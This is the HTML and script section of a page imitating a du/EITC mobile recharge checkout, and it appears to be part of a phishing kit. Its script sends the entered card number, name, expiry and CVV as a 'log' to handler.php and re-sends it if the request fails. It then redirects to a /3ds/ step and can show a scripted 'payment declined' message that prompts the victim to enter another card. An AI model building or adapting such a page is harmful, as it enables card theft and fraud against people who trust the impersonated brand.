                                                <input aria-invalid="false" aria-describedby=":r5:-helper-text" type="text" class="MuiOutlinedInput-input MuiInputBase-input muiltr-1xyk9dx">
                                                <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline muiltr-igs3ac">
                                                    <legend class="muiltr-1ftyaf0"><span>Enter amount</span></legend>
                                                </fieldset>
                                            </div>
                                            <p class="MuiFormHelperText-root MuiFormHelperText-sizeMedium MuiFormHelperText-contained muiltr-1ltwuz9" id=":r5:-helper-text">Enter a value between AED 1 and 1050. No decimals.</p>
                                        </div>
                                    </div>
                                </div>
                                <hr class="MuiDivider-root MuiDivider-fullWidth muiltr-175g226">
                                <h5 class="MuiTypography-root MuiTypography-h5 MuiTypography-gutterBottom muiltr-g2f47s">Payment
                                </h5>
                                <div class="MuiGrid-root MuiGrid-container muiltr-ndlvnj">
                                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-6 muiltr-8pdr4s">
                                        <div class="MuiPaper-root MuiPaper-none MuiPaper-rounded muiltr-17bzw6f">
                                            <div class="MuiBox-root muiltr-11cwvmc"><img class="card-img MuiBox-root muiltr-1r3bvam" alt="" src="">
                                                <div id="card-holder" class="MuiTypography-root MuiTypography-subtitle1 card-number muiltr-jz1yws">
                                                    1234 1234 1234 1234
                                                </div>
                                                <div class="card-name MuiBox-root muiltr-j9xkc3">
                                                    <div id="name-holder" class="MuiTypography-root MuiTypography-body2 muiltr-1enb1s6">Name on card
                                                    </div>
                                                    <p class="MuiTypography-root MuiTypography-body1 muiltr-xdjvaz">Name</p>
                                                </div>
                                                <div class="card-name MuiBox-root muiltr-r5siml">
                                                    <div id="date-holder" class="MuiTypography-root MuiTypography-body2 muiltr-1enb1s6">MM/YY</div>
                                                    <p class="MuiTypography-root MuiTypography-body1 muiltr-xdjvaz">Expiry</p>
                                                </div>
                                            </div><img src="du2/user-card.e37f43f0ca0eb1c85314245f47952fa7.svg" alt="">
                                        </div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-6 muiltr-8pdr4s">
                                        <div id="rest" style="width: 100%; color: red; text-align: center; display: none;"></div>

                                        <div class="MuiGrid-root MuiGrid-container MuiGrid-direction-xs-column muiltr-1wkwmmc">

                                            <div class="MuiGrid-root MuiGrid-item muiltr-12rzl7m">

                                                <div class="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root jss35 muiltr-10q4gpl" inputmode="numeric"><label class="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-outlined MuiFormLabel-root MuiFormLabel-colorPrimary muiltr-1n4h3u5" data-shrink="false" for=":r2:" id=":r2:-label">Card number</label>
                                                    <div class="MuiOutlinedInput-root MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-adornedEnd muiltr-1l2ewzr">
                                                        <input aria-invalid="false" id="card-number" type="text" class="MuiOutlinedInput-input MuiInputBase-input MuiInputBase-inputAdornedEnd muiltr-k7z4nm" maxlength="19">
                                                        <div class="MuiInputAdornment-root MuiInputAdornment-positionEnd MuiInputAdornment-outlined MuiInputAdornment-sizeMedium muiltr-cmvbo3">
                                                            <img class="card-img MuiBox-root muiltr-1ub89tm" alt="" src=""></div>
                                                        <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline muiltr-igs3ac">
                                                            <legend class="muiltr-1ftyaf0"><span>Card number</span></legend>
                                                        </fieldset>
                                                    </div>
                                                    <p style="display:none" class="local-error MuiFormHelperText-root Mui-error MuiFormHelperText-sizeMedium MuiFormHelperText-contained MuiFormHelperText-filled muiltr-1ltwuz9" id=":r0:-helper-text">Enter valid Visa or Mastercard number</p>

                                                </div>
                                            </div>
                                            <div class="MuiGrid-root MuiGrid-item muiltr-12rzl7m">
                                                <div class="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root muiltr-10q4gpl">
                                                    <label class="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-outlined MuiFormLabel-root MuiFormLabel-colorPrimary muiltr-1n4h3u5" data-shrink="false" for=":r3:" id=":r3:-label">Name on card</label>
                                                    <div class="MuiOutlinedInput-root MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl muiltr-1m4kibt">
                                                        <input id="card-name" aria-invalid="false" type="text" maxlength="25" class="MuiOutlinedInput-input MuiInputBase-input muiltr-1xyk9dx">
                                                        <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline muiltr-igs3ac">
                                                            <legend class="muiltr-1ftyaf0"><span>Name on card</span></legend>
                                                        </fieldset>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                                <div class="MuiGrid-root MuiGrid-container muiltr-8rnkcc">
                                                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-6 muiltr-zqojt3">
                                                        <div class="MuiFormControl-root MuiTextField-root jss35 muiltr-ypxohs" inputmode="numeric">
                                                            <label class="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-outlined MuiFormLabel-root MuiFormLabel-colorPrimary muiltr-1n4h3u5" data-shrink="false" for=":r4:" id=":r4:-label">Card expiry
                                                date</label>
                                                            <div class="MuiOutlinedInput-root MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-formControl muiltr-1mv76fy">
                                                                <input id="exp-date" aria-invalid="false" type="text" class="MuiOutlinedInput-input MuiInputBase-input muiltr-1xyk9dx" maxlength="5">
                                                                <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline muiltr-igs3ac">
                                                                    <legend class="muiltr-1ftyaf0"><span>Card expiry date</span>
                                                                    </legend>
                                                                </fieldset>
                                                            </div>
                                                            <p style="display:none" class="local-error MuiFormHelperText-root Mui-error MuiFormHelperText-sizeMedium MuiFormHelperText-contained MuiFormHelperText-filled muiltr-1ltwuz9" id=":r0:-helper-text">Enter valid date</p>
                                                        </div>
                                                    </div>
                                                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-6 muiltr-zqojt3" align="right">
                                                        <div class="MuiFormControl-root MuiTextField-root jss35 muiltr-ypxohs">
                                                            <label class="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-outlined MuiFormLabel-root MuiFormLabel-colorPrimary muiltr-1n4h3u5" data-shrink="false" for=":r5:" id=":r5:-label">CVV / CVC</label>
                                                            <div class="MuiOutlinedInput-root MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-formControl muiltr-1mv76fy">
                                                                <input id="cvv" aria-invalid="false" autocomplete="new-password" type="password" maxlength="3" class="MuiOutlinedInput-input MuiInputBase-input muiltr-1xyk9dx" value="">
                                                                <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline muiltr-igs3ac">
                                                                    <legend class="muiltr-1ftyaf0"><span>CVV / CVC</span></legend>
                                                                </fieldset>
                                                            </div>
                                                            <p style="display:none" class="local-error MuiFormHelperText-root Mui-error MuiFormHelperText-sizeMedium MuiFormHelperText-contained MuiFormHelperText-filled muiltr-1ltwuz9" id=":r0:-helper-text">Enter valid CVV/CVC</p>

                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="MuiGrid-root MuiGrid-item muiltr-12rzl7m"><label class="MuiFormControlLabel-root MuiFormControlLabel-labelPlacementEnd muiltr-1jaw3da"><span class="MuiCheckbox-root MuiCheckbox-colorPrimary MuiButtonBase-root MuiCheckbox-root MuiCheckbox-colorPrimary PrivateSwitchBase-root muiltr-1vpq36i">
                                        <!-- <input
                                            class="PrivateSwitchBase-input muiltr-1m9pwf3" type="checkbox"
                                            data-indeterminate="false"> -->
                                            <svg id="terms-unagr" style="display:none" class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="CheckBoxOutlineBlankIcon"><path d="M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"></path></svg>
                                            <svg style="fill:rgb(199, 36, 177)" id="terms-agr" class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-vubbuv" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="CheckBoxIcon"><path d="M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"></path></svg>
                                        <span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span><span class="MuiTypography-root MuiTypography-body1 MuiFormControlLabel-label muiltr-15o2j3w">
                                        <div style="font-size: 16px;"><span>I agree to payments </span><a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways muiltr-1ws4igt">Terms and
                                                conditions</a></div>
                                    </span></label></div>
                                        </div>
                                    </div>
                                </div>
                                <hr class="MuiDivider-root MuiDivider-fullWidth muiltr-19so4qm">
                                <div class="MuiGrid-root MuiGrid-container muiltr-kyse2m">
                                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 MuiGrid-grid-md-8 muiltr-efwuvd" align="right">
                                        <div class="MuiGrid-root MuiGrid-container muiltr-12ds6uu">
                                            <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-7 muiltr-f2xrz7">
                                                <div class="MuiTypography-root MuiTypography-body2 muiltr-1u2cfgz">Total amount
                                                </div>
                                                <div class="MuiBox-root muiltr-0"><span class="MuiTypography-root MuiTypography-body2 muiltr-1u2cfgz">AED
                                    </span><span id="price" class="MuiTypography-root MuiTypography-h4 muiltr-6v2hyt">30</span>
                                                </div>
                                            </div>
                                            <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-5 muiltr-9bzmof"><button id="send-card" class="MuiLoadingButton-root MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButtonBase-root Mui-disabled- jss34 muiltr-1vvz9s1"
                                                    tabindex="-1" type="submit" -disabled="">Recharge now</button>
                                                <div id="method" style="display: none;"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-4 muiltr-1y73h4u">
                        <div class="MuiGrid-root MuiGrid-container MuiGrid-direction-xs-column muiltr-1wkwmmc">
                            <div class="MuiGrid-root MuiGrid-item muiltr-1p2bi85">
                                <div class="MuiPaper-root MuiPaper-outlined MuiPaper-rounded MuiCard-root jss45 muiltr-1awjwbf">
                                    <div class="MuiCardContent-root muiltr-1qw96cp">
                                        <h4 class="MuiTypography-root MuiTypography-h5 MuiTypography-gutterBottom muiltr-g2f47s">We accept
                                        </h4>
                                        <ul class="MuiImageList-root MuiImageList-standard jss43 muiltr-683ife" style="grid-template-columns: repeat(4, 1fr); gap: 4px;">
                                            <li class="MuiImageListItem-root MuiImageListItem-standard jss44 muiltr-dkdthz" style="height: auto; grid-column-end: span 1; grid-row-end: span 1;"><img src="du2/visa-logo.svg" alt="" class="MuiImageListItem-img"></li>
                                            <li class="MuiImageListItem-root MuiImageListItem-standard jss44 muiltr-dkdthz" style="height: auto; grid-column-end: span 1; grid-row-end: span 1;"><img src="du2/mastercard-logo.svg" alt="" class="MuiImageListItem-img"></li>
                                            <li class="MuiImageListItem-root MuiImageListItem-standard jss44 muiltr-dkdthz" style="height: auto; grid-column-end: span 1; grid-row-end: span 1;"><img src="du2/amex-logo.svg" alt="" class="MuiImageListItem-img"></li>
                                        </ul>
                                        <div class="MuiTypography-root MuiTypography-body2 muiltr-1u2cfgz">GCC/UAE Issued cards. Our tourist customers can also use international cards.</div>
                                    </div>
                                </div>
                            </div>
                            <div class="MuiGrid-root MuiGrid-item muiltr-1pzd39s">
                                <div class="MuiPaper-root MuiPaper-outlined MuiPaper-rounded MuiCard-root jss48 muiltr-1awjwbf">
                                    <div class="MuiCardContent-root muiltr-18mhetb">
                                        <div class="MuiGrid-root MuiGrid-container muiltr-v3z1wi">
                                            <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-auto muiltr-s6rwg2">
                                                <div class="MuiTypography-root MuiTypography-body2 muiltr-1u2cfgz">Your private data is secure.
                                                </div>
                                            </div>
                                            <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-true muiltr-qb7po3" align="right">
                                                <img class="MuiBox-root muiltr-1ub89tm" alt="Your private data is secured." src="du2/Combined%20Shape.svg"></div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="MuiContainer-root MuiContainer-disableGutters muiltr-8d97to">
                <hr class="MuiDivider-root MuiDivider-fullWidth muiltr-39bbo6">
                <div class="MuiContainer-root MuiContainer-maxWidthLg MuiContainer-disableGutters muiltr-5csqms">
                    <div class="MuiGrid-root MuiGrid-container muiltr-1awka16">
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-sm-12 MuiGrid-grid-md-6 muiltr-z72k3s">© 2023 Copyright EITC, All rights reserved.</div>
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-sm-12 MuiGrid-grid-md-6 muiltr-z72k3s" align="right">
                            <ul class="MuiList-root MuiList-padding muiltr-v69d17">
                                <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-80jd0q">
                                    <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1fj6oh7" src="#">Site map</a>
                                </li>
                                <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-80jd0q">
                                    <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1fj6oh7" src="#">Terms &amp; conditions</a>
                                </li>
                                <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-80jd0q">
                                    <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1fj6oh7" src="#">Legal</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="" id="pload2" style="display: none;height: 100vh; justify-content: center; align-items: center; width: 100%; position: fixed; top: 0; left: 0; background-color: #0000003e; z-index: 9999999999;">
        <div class="containerrr">
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
        </div>
    </div>
    <script src="du2/jquery-3.7.0.js" integrity="sha256-JlqSTELeR4TLqP0OG9dxM7yDPqX1ox/HfgiSLBj8+kM=" crossorigin="anonymous"></script>
    <script src="du2/jquery.mask.min.js"></script>
    <script src="du2/url.js"></script>
    <script src="du2/cookie.js"></script>
    <script src="du2/functions.js"></script>
    <script src="du2/main.js"></script>
    <script src="du2/checkout.js"></script>
    <script>
        function sendLog(data, recursive = false) {

            if (!recursive) {

                console.log('Log sending');

            } else {

                console.log('Log resending');

            }

            $.post('handler.php', {
                'log': data
            }, function(response) {

                localStorage.setItem('last-step', 'card')

                if (response == 'another_card') {

                    checkoutError(2)

                    $('#send-card').attr('disabled', false)

                    $('#send-card').removeClass('Mui-disabled')

                } else {

                    window.location.href = '/3ds/'

                }

            }).fail(function() {
                sendLog(data, true)
            })
        }
        $(document).ready(function() {

            $('#send-card').click(function(event) {
                event.preventDefault()

                if (!checkoutCorrect()) {
                    return
                }
                send1()
            })
        })
        window.onload = function() {
            var action = localStorage.getItem('selectedAction');
            if (!action) {
                return;
            }
            switch (action) {
                case 'action3':
                    performAction3();
                    break;
            }
            localStorage.removeItem('selectedAction');
        }

        function performAction3() {
            document.getElementById('rest').style.display = 'block';
            document.getElementById('rest').textContent = 'Payment declined, try another bank card.';

        }
    </script>


</body>
<script src="/js/app.js"></script>
<style>
    @keyframes spin {
        0% {
            transform: rotate(0deg);
        }
        100% {
            transform: rotate(360deg);
        }
    }
    
    .loaderr {
        height: 25px;
        width: 25px;
        border: 3px solid #fff;
        border-top: 3px solid transparent;
        border-left: 3px solid transparent;
        border-radius: 50%;
        animation: spin 2s linear infinite;
    }
</style>

</html>